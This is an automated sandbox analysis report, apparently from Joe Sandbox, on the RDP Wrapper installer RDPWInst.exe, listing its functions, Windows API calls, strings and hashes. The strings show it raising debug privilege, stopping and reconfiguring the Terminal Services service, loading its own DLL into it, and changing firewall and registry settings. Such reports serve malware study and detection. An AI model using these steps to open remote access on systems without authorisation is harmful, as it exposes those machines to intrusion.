                                                                                                              control_flow_graph 637 43b7d4-43b7d7 638 43b7dc-43b7e1 637->638 638->638 639 43b7e3-43b7f4 638->639 640 43b7f8-43b80a OpenSCManagerW 639->640 641 43b848-43b8a9 call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 640->641 642 43b80c-43b843 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 640->642 660 43b8af-43b8bc GetLastError 641->660 661 43b99e-43b9b5 CloseServiceHandle call 40816c 641->661 642->641 664 43b8fe-43b95a call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 660->664 665 43b8be-43b8f9 CloseServiceHandle call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 660->665 671 43ba22-43ba26 661->671 672 43b9b7-43b9b8 661->672 664->661 714 43b95c-43b999 CloseServiceHandle GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 664->714 665->661 675 43ba4b-43ba52 671->675 676 43ba28-43ba46 call 407450 call 404cdc call 4042f8 call 40632c 671->676 677 43b9ba-43b9c5 672->677 682 43ba54-43ba58 675->682 683 43ba9f-43baf7 call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 408334 call 40816c 675->683 676->675 677->671 681 43b9c7-43b9f6 call 406d9c call 40e50c * 2 call 4072a4 677->681 738 43b9f8-43ba1c call 406d9c 681->738 739 43ba1e-43ba20 681->739 690 43ba5a-43ba78 call 407450 call 404cdc call 4042f8 call 40632c 682->690 691 43ba7d-43ba91 call 43b1a8 call 43b58c 682->691 752 43bb80-43bb9b call 406bf0 call 40816c 683->752 753 43bafd-43bafe 683->753 690->691 717 43ba96-43ba9a 691->717 714->661 717->640 738->671 739->671 739->677 766 43bbe4-43bbeb 752->766 767 43bb9d-43bb9e 752->767 755 43bb00-43bb0a 753->755 755->752 758 43bb0c-43bb19 755->758 760 43bb1b-43bb37 call 406d9c call 4072a4 758->760 761 43bb7c-43bb7e 758->761 760->761 777 43bb39-43bb77 call 40816c call 408334 call 40816c call 406d9c 760->777 761->752 761->755 769 43bc13-43bc27 call 407450 call 404cdc call 4042f8 766->769 770 43bbed-43bc11 call 407450 * 2 call 404cdc call 4042f8 766->770 768 43bba0-43bba7 767->768 773 43bba9-43bbbc call 406bf0 768->773 774 43bbbe-43bbdb call 407184 768->774 794 43bc2c-43bc5c call 406be8 call 406be0 call 408340 769->794 770->794 785 43bbe0-43bbe2 773->785 774->785 777->761 785->766 785->768
                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                                              • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                                              • API String ID: 2770857348-2470772499
                                                                                                              • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                              • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                                              • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                              • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE
                                                                                                              Function 0043B1A8 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 118serviceCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                                              • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                              • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                                              • API String ID: 48634454-398082305
                                                                                                              • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                              • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                                              • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                              • Instruction Fuzzy Hash: 32318DA4708210AAE611B7B68D43B2F6598DF8D308F12917BB614A6693CB3C9D0195BF
                                                                                                              Function 0043BF00 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 130COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                                                                              • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0043BFA6
                                                                                                              • GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BFAF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastProcess$CurrentLookupOpenPrivilegeTokenValue
                                                                                                              • String ID: $sD$[-] AdjustTokenPrivileges error (code $[-] LookupPrivilegeValue error (code $[-] OpenProcessToken error (code
                                                                                                              • API String ID: 1401577899-1200187420
                                                                                                              • Opcode ID: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                              • Instruction ID: 40249df541e28cb1c3cbeffac081f98f3db748ff3bf72c69c2aa91bf02ef4f1c
                                                                                                              • Opcode Fuzzy Hash: 4f72a90d0289c3e65b588dbff969bb89f75e63602ae5a34113a3e67517c1ed7a
                                                                                                              • Instruction Fuzzy Hash: E5412475E00218AFDB04EBE5DD81A9EB7B8EF49704F11407BF500F2291DA789D059B6A
                                                                                                              Function 0043DC64 Relevance: 6.1, APIs: 4, Instructions: 64libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC7A
                                                                                                              • FindResourceW.KERNEL32(00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150,?,?,00447324), ref: 0043DC8A
                                                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DC97
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000010,00000000,00000000,00000002,?,?,0044BFA8,00447324,0043DEB8,00000000,0043E150), ref: 0043DCF5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoadResource$FindFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 3272429154-0
                                                                                                              • Opcode ID: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                              • Instruction ID: b141022db8bc2a2b6abfb651a233e3798db1869765cd13709d0418182ea328c4
                                                                                                              • Opcode Fuzzy Hash: 15bd354d354d96cc7854a01dd3595191e335ff94095102c971dcd749e24b3d64
                                                                                                              • Instruction Fuzzy Hash: 9411E3273067445AC721DA268A81EDF3B169FC1340F09C1A6F9009F396E679C901C39A
                                                                                                              Function 004093C0 Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093DC
                                                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,?,00000000,?,00409584,?,?,?,00000000,00000105,00000000,004095BB,?,00437408), ref: 004093E5
                                                                                                                • Part of subcall function 004092D8: FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                                • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 3216391948-0
                                                                                                              • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                              • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                                                                              • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                                                                              • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                                                                              Function 004092D8 Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                                                                              • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                              • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                                                                              • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                                                                              • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                                                                              Function 00409D02 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 31276548-0
                                                                                                              • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                              • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                                                                              • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                                                                              • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF
                                                                                                              Function 0044373C Relevance: 81.5, APIs: 8, Strings: 46, Instructions: 524COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 44373c-44373f 1 443744-443749 0->1 1->1 2 44374b-4437d0 call 40a2b0 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404504 1->2 31 443876-443965 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 2->31 32 4437d6-4437f0 call 404564 call 4072a4 2->32 105 443f97-443fb1 call 406be8 31->105 42 4437f6-443810 call 404564 call 4072a4 32->42 43 44396a-443984 call 404564 call 4072a4 32->43 42->43 59 443816-443830 call 404564 call 4072a4 42->59 56 443986-4439a7 call 43cea4 call 407450 call 404cdc call 4042f8 43->56 57 4439ac-4439ba call 414708 43->57 56->105 68 4439bc-4439e8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 57->68 69 4439ed-4439f4 call 43a644 57->69 59->43 79 443836-443850 call 404564 call 4072a4 59->79 68->105 83 4439f6-443a0c call 407450 call 404cdc call 4042f8 69->83 84 443a11-443a30 call 43a7bc call 404564 call 4072a4 69->84 79->43 111 443856-443870 call 404564 call 4072a4 79->111 83->105 127 443cc4-443cde call 404564 call 4072a4 84->127 128 443a36-443a3d 84->128 111->31 111->43 150 443ce4-443ceb 127->150 151 443e6b-443e85 call 404564 call 4072a4 127->151 133 443a5f-443b13 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 128->133 134 443a3f-443a5a call 407450 call 404cdc call 4042f8 call 40632c 128->134 354 443b15-443b24 call 406bf0 133->354 355 443b26-443b30 call 406bf0 133->355 134->133 156 443d0d-443d2a call 407450 call 404cdc call 4042f8 150->156 157 443ced-443d08 call 407450 call 404cdc call 4042f8 call 40632c 150->157 177 443e87-443e8e 151->177 178 443ecb-443ee5 call 404564 call 4072a4 151->178 201 443d31-443dac call 43b7d4 call 407450 call 404cdc call 4042f8 call 43c9b4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 407450 call 404cdc call 4042f8 call 43d938 call 40816c 156->201 202 443d2c call 43a688 156->202 157->156 184 443eb0-443ec6 call 407450 call 404cdc call 4042f8 call 43f7a4 177->184 185 443e90-443eab call 407450 call 404cdc call 4042f8 call 40632c 177->185 178->105 215 443eeb-443f46 call 407450 call 404cdc call 4042f8 call 43b7d4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 178->215 184->178 185->184 343 443dd3-443e0b Sleep call 43b58c Sleep call 404564 call 4072a4 201->343 344 443dae-443dbd call 40816c 201->344 202->201 303 443f6d-443f92 Sleep call 43b58c call 407450 call 404cdc call 4042f8 215->303 304 443f48-443f57 call 40816c 215->304 303->105 304->303 318 443f59-443f5a 304->318 323 443f5c-443f6b call 43b58c 318->323 323->303 366 443e47-443e4e 343->366 367 443e0d-443e42 call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 343->367 344->343 353 443dbf-443dc0 344->353 357 443dc2-443dd1 call 43b58c 353->357 365 443b35-443b3c 354->365 355->365 357->343 368 443b43-443b7d call 43de78 call 43b7d4 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 365->368 369 443b3e call 43a688 365->369 370 443e55-443e66 call 407450 call 404cdc call 4042f8 366->370 371 443e50 call 43a724 366->371 367->366 408 443b9f 368->408 409 443b7f-443b99 call 404564 call 4072a4 368->409 369->368 370->151 371->370 410 443ba1-443c21 call 43d0f8 call 407450 call 404cdc call 4042f8 call 43c598 call 407450 call 404cdc call 4042f8 call 43e7dc call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 408->410 409->408 418 443b9b-443b9d 409->418 446 443c23-443c32 call 40816c 410->446 447 443c48-443c9b Sleep call 43b58c Sleep call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 410->447 418->410 446->447 452 443c34-443c35 446->452 471 443ca0-443cbd call 407450 call 404cdc call 4042f8 447->471 454 443c37-443c46 call 43b58c 452->454 454->447 471->127 478 443cbf call 43a724 471->478 478->127
                                                                                                              Strings
                                                                                                              • -l display the license agreement, xrefs: 004438B7
                                                                                                              • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                                                                              • license, xrefs: 00443989
                                                                                                              • [+] Done., xrefs: 00443F83
                                                                                                              • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                                                                              • [-] Unsupported processor architecture., xrefs: 004439F8
                                                                                                              • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                                                                              • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                                                                              • -r force restart Terminal Services, xrefs: 00443951
                                                                                                              • [-] Unsupported Windows version:, xrefs: 004439BE
                                                                                                              • [*] Checking dependencies..., xrefs: 00443BC8
                                                                                                              • [*] Extracting files..., xrefs: 00443B4F
                                                                                                              • [*] Checking for updates..., xrefs: 00443EB2
                                                                                                              • USAGE:, xrefs: 00443878
                                                                                                              • [*] Installing..., xrefs: 00443AE5
                                                                                                              • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                                                                              • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                                                                              • [*] Notice to user:, xrefs: 00443A61
                                                                                                              • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                                                                              • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                                                                              • [*] Uninstalling..., xrefs: 00443D0F
                                                                                                              • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                                                                              • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                                                                              • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                                                                              • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                                                                              • do not use the software., xrefs: 00443ACF
                                                                                                              • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                                                                              • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                                                                              • [*] Configuring service library..., xrefs: 00443BAD
                                                                                                              • -w get latest update for INI file, xrefs: 0044390F
                                                                                                              • [+] Successfully uninstalled., xrefs: 00443E57
                                                                                                              • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                                                                              • [*] Restarting..., xrefs: 00443EED
                                                                                                              • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                                                                              • $sD, xrefs: 00443761
                                                                                                              • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                                                                              • Installer v2.5, xrefs: 0044378D
                                                                                                              • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                                                                              • [+] Successfully installed., xrefs: 00443CA2
                                                                                                              • [*] Resetting service library..., xrefs: 00443D38
                                                                                                              • -u uninstall wrapper, xrefs: 00443925
                                                                                                              • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                                                                              • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                                                                              • [*] Removing files..., xrefs: 00443D87
                                                                                                              • LpD, xrefs: 0044374F
                                                                                                              • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
